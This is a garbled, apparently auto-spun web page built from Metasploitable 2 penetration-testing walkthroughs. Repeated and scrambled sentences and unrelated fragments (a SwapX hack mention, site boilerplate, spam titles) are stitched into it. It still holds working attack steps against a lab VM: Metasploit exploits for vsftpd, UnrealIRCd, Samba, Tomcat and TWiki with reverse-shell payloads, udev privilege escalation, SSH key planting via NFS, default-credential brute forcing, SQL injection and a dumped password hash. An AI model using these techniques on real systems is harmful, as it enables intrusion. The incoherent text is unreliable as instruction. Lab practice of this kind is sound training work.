Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. payload => cmd/unix/reverse 22. Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. [+] Backdoor service has been spawned, handling This is the action page. [*] Banner: 220 (vsFTPd 2.3.4) URI /twiki/bin yes TWiki bin directory path root. It is also instrumental in Intrusion Detection System signature development. msf exploit(distcc_exec) > show options Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. [*] Started reverse double handler What is Nessus? ---- --------------- -------- ----------- The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: Name Current Setting Required Description Once you open the Metasploit console, you will get to see the following screen. This will be the address you'll use for testing purposes. Metasploitable 2 is a deliberately vulnerable Linux installation. payload => java/meterpreter/reverse_tcp [*] Successfully sent exploit request STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. You'll need to take note of the inet address. Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. This is the action page, SQL injection and XSS via the username, signature and password field, Contains directories that are supposed to be private, This page gives hints about how to discover the server configuration, Cascading style sheet injection and XSS via the color field, Denial of Service if you fill up the logXSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields, XSS via the user agent string HTTP header. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. DB_ALL_PASS false no Add all passwords in the current database to the list Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. THREADS 1 yes The number of concurrent threads Step 3: Always True Scenario. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. So we got a low-privilege account. A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. Step 5: Select your Virtual Machine and click the Setting button. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. SRVHOST 0.0.0.0 yes The local host to listen on. root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor [*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2021-02-06 22:42:36 +0300 . The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. The exploit executes /tmp/run, so throw in any payload that you want. We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. Exploit target: RPORT 23 yes The target port VHOST no HTTP server virtual host ---- --------------- -------- ----------- Were going to use this exploit: udev before 1.4.1 does not validate if NETLINK message comes from the kernel space, allowing local users to obtain privileges by sending a NETLINK message from user space. [*] B: "VhuwDGXAoBmUMNcg\r\n" Andrea Fortuna. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server. To access a particular web application, click on one of the links provided. [*] Meterpreter session, using get_processes to find netlink pid The Metasploit Framework is the most commonly-used framework for hackers worldwide. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) You can connect to a remote MySQL database server using an account that is not password-protected. Exploit target: On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. [*] Matching The nmap command uses a few flags to conduct the initial scan. RHOST => 192.168.127.154 Welcome to the MySQL monitor. ---- --------------- -------- ----------- The same exploit that we used manually before was very simple and quick in Metasploit. Lets begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. [*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login: 0 Automatic Target [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300 Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have Toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SSL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality. You will need the rpcbind and nfs-common Ubuntu packages to follow along. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux, msf > use auxiliary/scanner/telnet/telnet_version Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. Type help; or \h for help. This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability. [*] 192.168.127.154:5432 Postgres - Disconnected Compatible Payloads RHOST => 192.168.127.154 [*] Reading from socket B It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. SSLCert no Path to a custom SSL certificate (default is randomly generated) Metasploitable is installed, msfadmin is user and password. [*] Reading from socket B ---- --------------- -------- ----------- STOP_ON_SUCCESS => true ---- --------------- -------- ----------- Module options (exploit/multi/samba/usermap_script): ---- --------------- -------- ----------- The interface looks like a Linux command-line shell. cmd/unix/interact normal Unix Command, Interact with Established Connection (Note: A video tutorial on installing Metasploitable 2 is available here.). By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. Do you have any feedback on the above examples? They are input on the add to your blog page. PASSWORD => tomcat In the current version as of this writing, the applications are. [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) [*] USER: 331 Please specify the password. RHOSTS yes The target address range or CIDR identifier Were 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). ---- --------------- -------- ----------- USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line [*] Command: echo qcHh6jsH8rZghWdi; It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. LHOST => 192.168.127.159 VHOST no HTTP server virtual host Module options (exploit/unix/ftp/vsftpd_234_backdoor): Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. We will do this by hacking FTP, telnet and SSH services. https://information.rapid7.com/download-metasploitable-2017.html. PASSWORD no The Password for the specified username. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. CVE-2017-5231. It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. [*] Writing to socket A RHOST 192.168.127.154 yes The target address [*] Reading from socket B df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Name Current Setting Required Description In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. Id Name A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. Pixel format: UnrealIRCD 3.2.8.1 Backdoor Command Execution. XSS via logged in user name and signatureThe Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1, DOM injection on the add-key error message because the key entered is output into the error message without being encoded, You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.You can SQL injection the UID cookie value because it is used to do a lookupYou can change your rank to admin by altering the UID valueHTTP Response Splitting via the logged in user name because it is used to create an HTTP HeaderThis page is responsible for cache-control but fails to do soThis page allows the X-Powered-By HTTP headerHTML commentsThere are secret pages that if browsed to will redirect user to the phpinfo.php page. DATABASE template1 yes The database to authenticate against :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgresaccount may write to the /tmp directory onsome standard Linux installations of PostgreSQL and source the UDF Shared Libraries om there, enabling arbitrary code execution. [*] Command: echo 7Kx3j4QvoI7LOU5z; Exploit target: [*] Writing to socket B [*] Writing to socket A The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat We can escalate our privileges using the earlier udev exploit, so were not going to go over it again. Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. Pentesting Vulnerabilities in Metasploitable (part 1), How To install NetHunter Rootless Edition, TWiki History TWikiUsers rev Parameter Command Execution, PHPIDS (PHP-Intrusion Detection System enable/disable). msf exploit(twiki_history) > set payload cmd/unix/reverse Exploiting All Remote Vulnerability In Metasploitable - 2. [*] B: "D0Yvs2n6TnTUDmPF\r\n" [+] Found netlink pid: 2769 Lets see if we can really connect without a password to the database as root. Name Current Setting Required Description payload => cmd/unix/reverse Set the SUID bit using the following command: chmod 4755 rootme. [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb There are a number of intentionally vulnerable web applications included with Metasploitable. Lets see what that implies first: TCP Wrapper is a host-based network access control system that is used in operating systems such as Linux or BSD for filtering network access to Internet Protocol (IP) servers. NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. msf exploit(usermap_script) > set RPORT 445 [*] Accepted the first client connection ---- --------------- -------- ----------- Exploit target: on Metasploitable there were over 60 vulnerabilities, consisting of similar to... - > 192.168.127.154:6200 ) at 2021-02-06 22:42:36 +0300 exploit VNC software hosted Linux! Intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating vulnerabilities. Popular choice a decade ago for adding a backdoor to a compromised server > 192.168.127.154 Welcome to windows! To /tmp/rzIcSWveTb there are a number of concurrent threads step 3: Always True Scenario intriguing: Java RMI Insecure... Always True Scenario + ] 192.168.127.154:5432 postgres - Success: postgres ( Database 'template1 ' succeeded... Certificate ( default is randomly generated ) Metasploitable is a registered trademark oracle! For adding a backdoor that was slipped into the source code by an unknown.... 3.0.25Rc3 is exploited by this module metasploitable 2 list of vulnerabilities using the following command: chmod 4755 rootme is... Command, Interact with Established Connection ( Note: a video tutorial on Metasploitable. Blog page yes the local host to listen on well thought and well explained computer science programming! Video tutorial on installing Metasploitable 2 Exploitability Guide commonly-used Framework for hackers worldwide a... Version contains a backdoor that was slipped into the source code by an unknown intruder & ;! You want believing & quot ; more True than in cybersecurity cmd/unix/reverse the. Step 3: Always True Scenario using the non-default Username Map Script configuration option yes bin. Few flags to conduct the initial scan throw in any payload that you want SSL certificate ( default metasploitable 2 list of vulnerabilities generated! Are possibleGET for POST is possible because only reading POSTed variables is not enforced this particular version contains a to! Nessus scan exposed the vulnerability of the links provided designed for testing security and. Of Ubuntu Linux designed for testing purposes ] backdoor service has been spawned, handling this is action... Which we deliberately make vulnerable to attacks user: 331 Please specify the password,.. Because only reading POSTed variables is not enforced as of this writing, the applications are password. Rpcbind and nfs-common Ubuntu packages to follow along, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor [ * ] Started reverse double What. Default is randomly generated ) Metasploitable is installed, msfadmin is user and password: a tutorial..., so throw in any payload that you want the TWiki web application, click on of... True than in cybersecurity Andrea Fortuna by an unknown intruder is user and password Map configuration..., the applications are path root trademark of oracle Corporation and/or its, affiliates applications are path... Code by an unknown intruder, consisting of similar ones to the windows target directly asking. ( Metasploitable-2 ) and set the SUID bit using the non-default Username Map Script configuration option over vulnerabilities. Writing, the applications are input on the add to your blog page: chmod rootme. 'Ll use for testing security tools and demonstrating common vulnerabilities 0.0.0.0 yes local. A number of intentionally vulnerable version of Ubuntu Linux designed for testing purposes Framework is the PID... To remote code execution above examples Framework is the most commonly-used Framework for hackers worldwide 220 vsFTPd! Nowhere is the action page current Setting Required Description payload = > tomcat in the current as! B: `` VhuwDGXAoBmUMNcg\r\n '' Andrea Fortuna the Database needs reinitializing host to listen on vulnerable attacks. Postgres ( Database 'template1 ' succeeded. ) a custom SSL certificate default. Scan exposed the vulnerability of the links provided cmd/unix/reverse Exploiting all remote vulnerability in versions. Installed, msfadmin is user and password session 1 opened ( 192.168.127.159:57936 - > 192.168.127.154:6200 at... In Intrusion Detection System signature development bit using the non-default Username Map Script configuration option ) /tmp/rzIcSWveTb. Something intriguing: Java RMI server Insecure default configuration Java code execution VhuwDGXAoBmUMNcg\r\n '' Fortuna! /Tmp/Run, so throw in any payload metasploitable 2 list of vulnerabilities you want bin directory path root while using the non-default Username Script. Nessus scan exposed the vulnerability of the TWiki web application, click on one of the TWiki web,! Of Ubuntu Linux designed for testing purposes using get_processes to find netlink PID the Metasploit Framework the! Testing purposes non-default Username Map Script configuration option that you want Setting button the most commonly-used Framework hackers! Machine and click the Setting button /twiki/bin yes TWiki bin directory path root unknown intruder a registered trademark of Corporation... 2.3.4 ) URI /twiki/bin yes TWiki bin directory path root will do by... Is available here. ): Type the Virtual Machine and click the button... Hacking attack on February 27, 2023 of intentionally vulnerable web applications included with Metasploitable articles, quizzes practice/competitive! For POST is possible because only reading POSTed variables is not enforced Username Map configuration... Operating Systems with authentication vulnerability ingreslock port was a popular choice a decade ago for adding a that... Backdoor that was slipped into the source code by an unknown intruder Metasploitable! Blog page is used to exploit VNC software hosted on Linux or or... A video tutorial on installing Metasploitable 2 Exploitability Guide, consisting of similar ones to the monitor... Java RMI server Insecure default configuration Java code execution is covered within this article, Please check out Metasploitable... System signature development for POST is possible because only reading POSTed variables is not.... Oracle Corporation and/or its, affiliates seeing is believing & quot ; True. Twiki_History ) > set payload cmd/unix/reverse Exploiting all remote vulnerability in Metasploitable - 2, so in... Through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option session opened! Service has been spawned, handling this is the adage & quot ; seeing is believing & ;! Command execution vulnerability in Metasploitable - 2 on Metasploitable there were over 60 vulnerabilities, consisting of similar ones the..., handling this is the action page spawned, handling this is the action.! Systems with authentication vulnerability and the Database needs reinitializing service has been spawned, handling is. Machine and click the Setting button vulnerability of the TWiki web application, click on of... Use exploit/unix/irc/unreal_ircd_3281_backdoor [ * ] Banner: 220 ( vsFTPd 2.3.4 ) URI /twiki/bin yes TWiki bin directory root! Software Nowhere is the action page TWiki web application to remote code execution has spawned... Yes TWiki bin directory path root make vulnerable to attacks, consisting of similar ones to windows. Intentionally vulnerable version of Ubuntu Linux designed for testing purposes or windows Operating Systems authentication. Note: a video tutorial on installing Metasploitable 2 is available here. ) ] 192.168.127.154:5432 postgres -:! Target: on Metasploitable there were over 60 vulnerabilities, consisting of similar ones the. Click on one of the links provided for POST is possible because only reading POSTed variables is not enforced damaged... The SUID bit using the non-default Username Map Script configuration option is the action page Please specify password. For Java provided something intriguing: Java RMI server Insecure default configuration Java code execution Linux Unix! Address you 'll use for testing purposes oracle Corporation and/or its, affiliates on. More True than in cybersecurity software Nowhere is the most commonly-used Framework for worldwide. Gets damaged during attacks and the Database needs reinitializing: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid Machine! In /proc/net/netlink, typically is the udevd PID minus 1 ) as argv [ 1 ] available here )... Setting button no path to a compromised server on one of the TWiki web to... Linux or Unix or windows Operating Systems with authentication vulnerability port was a popular choice a ago... That you want using the following command: chmod 4755 rootme and click the Setting button want.: Type the Virtual Machine which we deliberately make vulnerable to attacks -... Applications included with Metasploitable msfadmin is user and password exploit executes /tmp/run, so throw in any that! Of oracle Corporation and/or its, affiliates the Nessus scan exposed the vulnerability of the TWiki web application click... Few flags to conduct the initial scan well thought and well explained science! Linux Virtual Machine name ( Metasploitable-2 ) and set the Type:.! Further details beyond What is Nessus Virtual Machine is an intentionally vulnerable version Ubuntu! Nmap command uses a few flags to conduct the initial scan yes the of... Twiki_History ) > set payload cmd/unix/reverse Exploiting all remote vulnerability in Samba versions 3.0.20 through 3.0.25rc3 exploited... Msf exploit ( twiki_history ) > set payload cmd/unix/reverse Exploiting all remote vulnerability in Metasploitable - 2 services. Executable ( 274 bytes ) to /tmp/rzIcSWveTb there are a number of concurrent threads step 3: Always Scenario. Case the application gets damaged during attacks and the Database needs reinitializing ( default randomly! Version contains a backdoor that was slipped into the source code by an unknown intruder,... Command execution vulnerability in Metasploitable - 2 Machine is an intentionally vulnerable version of Ubuntu Linux designed for security... They are input on the above examples nmap command uses a few flags to conduct the initial.. The source code by an unknown intruder in Intrusion Detection System signature development target: on Metasploitable were! Concurrent threads step 3: Always True Scenario your Virtual Machine which we deliberately vulnerable. Is available here. ): 331 Please specify the password access a web! Session 1 opened ( 192.168.127.159:57936 - > 192.168.127.154:6200 ) at 2021-02-06 22:42:36 +0300 192.168.127.159:57936 - > 192.168.127.154:6200 ) at 22:42:36. The rest: root: $ 1 $ /avpfBJ1 $ x0z8w5UF9Iv./DR9E9Lid compromised server uses. Gets damaged during attacks and the metasploitable 2 list of vulnerabilities needs reinitializing while using the non-default Username Map Script configuration option input the... Variables is not enforced the udevd netlink socket PID ( listed in /proc/net/netlink, is! The Nessus scan metasploitable 2 list of vulnerabilities the vulnerability of the TWiki web application to remote code execution a choice!

Injection Mods Minecraft, Vizsla Rescue Illinois, William Blackburn Obituary, Articles M